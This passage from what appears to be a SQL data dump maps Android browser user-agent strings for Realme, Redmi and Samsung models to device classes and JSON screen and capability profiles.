Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX2103) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX2111) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX2144) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX2151) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX2155) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX2170) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX2180) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX2185) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX2189) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX2193) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX2195) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; RMX3201) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi 5 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi 7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi 7A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi 8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi 8A Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi 8A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi 9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi 9A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi 9C NFC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi 9T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi K20 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi K20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi K30) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi Note 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi Note 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi Note 6 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":830,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi Note 7 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi Note 7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi Note 8 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi Note 8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi Note 8T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi Note 9 Pro Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi Note 9 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi Note 9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Redmi Note 9S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_redmi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; S20 Ultra ApeX 2021) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; S3-SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; S42) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; S5 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; S52) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; S58Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; S62 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; S7-SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; S88Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A013M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A015F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A015M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A022G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A022M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A025G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A105F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A105FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A105G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A105M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A107F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A107M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A115F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A115M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A125F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A125M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A202F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A205F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A205FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A205G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A207F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A207M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A217F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A217M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A305F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A305FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A305G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A305GT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A307FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A307G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A307GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A307GT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A315F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A315G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A405FM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 